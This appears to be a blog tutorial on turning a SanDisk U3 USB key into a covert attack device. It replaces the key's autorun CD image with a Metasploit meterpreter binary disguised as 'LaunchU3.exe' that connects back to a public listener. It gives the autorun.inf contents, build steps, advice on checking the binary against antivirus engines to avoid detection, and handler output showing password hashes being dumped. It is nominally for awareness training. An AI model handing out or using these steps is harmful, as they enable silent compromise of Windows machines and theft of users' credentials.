There are a million ways to create a malicious USB key – here is one more which may or may not already be out there. In recent tests, this worked pretty well on PC’s running XP – Vista & Windows 7 appear more dicey.
In conducting some recent tests I needed something that was a bit more likely to get the data I need and less likely to get picked up by Virus Scanners. This article describes a combination of techniques to achieve a USB key that operates silently & remotely so that key recovery is not required to know who inserted the key or to gather data from their system. The attack focused on Windows as the easiest platform to attack and leverages the capabilities of the Sandisk U3 USB key and a meterpreter binary.
I’m using this for awareness training but you can use your imagination to come up with other options you can try out with permission.
Background
There are some good articles which describe how the U3 system works. It effectively emulates a cdrom drive being inserted into a PC. Most PC’s, while they will not fully auto-run from a USB stick, will autorun a CD. The U3 drives take advantage of this – and so can you.
For those not familiar with metasploit, get familiar. What I’ll show you here is just the tip of the iceberg. The advantage to using metasploit for this is that you have a large amount of control over the data gathered & nothing is written to the victim system. The meterpreter process runs entirely in memory making detection difficult.
The basis for this technique are the following articles:
Automating Meterpreter – excellent post about how to automate your data collection once meterpreter is executed. This also shows a sample of how to generate the meterpreter binary.
McGrew’s HackingU3 – this article may be dated, but got me pointed in the right direction and provides a lot of detail about how U3 works.
Universal U3 LaunchPad Hacker – This great folks at Hak5 provided a nice tool for making updating the U3 image even easier. This is the technique used in the article here.
The tools required:
Metasploit – I use Linux as the OS of choice – in particular a BackTrack4 virtual machine.
A public server – If you want to listen for reverse_tcp connections you’ll need a server that can run metasploit and listen publicly for client connections. You can use a hostname in your payload, so the IP does not need to be static. If you are testing this inside a corporation and want to limit access, you can run this on an internal server – I leave that up to you.
Sandisk U3 usb key – I found 2gig keys for $4.99 each. Get them cheap enough so you don’t mind losing them.
A windows system on which you can test. Testing is very important before you go dropping keys all over the place – make sure things work!
Creating the meterpreter binary & Setting up the Metasploit listener
I followed the Automating Meterpreter page almost verbatim for creating my windows binary and setting up metasploit to listen for incoming reverse_tcp connections. I recommend doing the same and using the same ‘scraper.rb’ script to collect data from clients. I did modify the scraper.rb script so that it did not pull the full registry keys because that process was taking a bit of time & generated visible errors to the user on my XP VM. There is plenty of data available to identify the user without pulling the registry.
If you want to test how well your new meterpreter binary will do against the various antivirus out there, try submitting the binary to VirusTotal. This site has been great to understand what to expect before dropping keys. In my tests, the binary generated by metasploit does a pretty good job of avoiding A/V detection but a few did flag it. Compare the results to what you are using in your environment.
Building your new USB key
There are a few different ways to do this but the easiest way seems to be using the Universal Customizer. This allows you to plop a few files into a directory, generate a new ISO to replace the default U3 ISO image, and load it onto the U3 drive. Here are the steps for those who need them:
Download & extract the Universal Customizer package onto some Windows hosts. Insert your U3 drive and make sure you close the LaunchU3 application if it launches.
To make things look innocent, rename your meterpreter binary “LaunchU3.exe”. Place this file into the “U3CUSTOM” directory within the Universal_Cusomizer folder you just extracted.
With a text editor, create a file named ‘autorun.inf’ in the ‘U3CUSTOM’ folder with the following contents:
[AutoRun]
open=LaunchU3.exe
Save that file, you now have all you need for your updated ISO image. You should have two files in the U3CUSTOM directory:
autorun.inf (your autorun file which tells the PC to execute LaunchU3.exe)
LaunchU3.exe (your meterpreter binary disguised as the innocent U3 Launcher)
Once you have those files in place you need to run the “ISOCreate.cmd” batchfile within the “Universal_Customizer” directory. This will replace the “Universal_Customizer\BIN\U3CUSTOM.ISO” file with an ISO containing the files you placed in the “U3CUSTOM” directory.
Now that you have an updated ISO, you just run “Universal_Cusomizer.exe” and follow the prompts. It will replace the ISO on your drive with one containing your meterpreter binary.
Now the Fun begins
Now that you’ve got a fully armed U3 drive, it’s time to run some tests. Make sure you have your metasploit instance running with your autorun script & plug that sucker into a PC. You shouldn’t see much on the PC other than the U3 drive being detected and possibly opened for viewing.
On the metaploit instance though, the story is a bit different:
msf exploit(handler)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] New session on 192.168.1.1:58621...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Completed processing on 192.168.1.1:58621...
[*] Meterpreter session 20 opened (192.168.1.2:16555 - 192.168.1.1:58621)
And there you go. You should find all the collected details of the host in ~/.msf/logs/scraper/ in a directory named after the host/session:
(~/.msf3/logs/scraper/192.168.1.1_20090709.162917553): ls
env.txt hashes.txt nethood.txt services.txt system.txt
group.txt localgroup.txt network.txt shares.txt users.txt
If you look at the contents of one of these files you will see the relevant details. From here, it’s up to you to decide how you use this.
Big thanks to Wesley McGrew, Dale Pearson, the folks @ Hak5 and the great Exotic Liability members for the synchronous and asynchronous assistance with this project.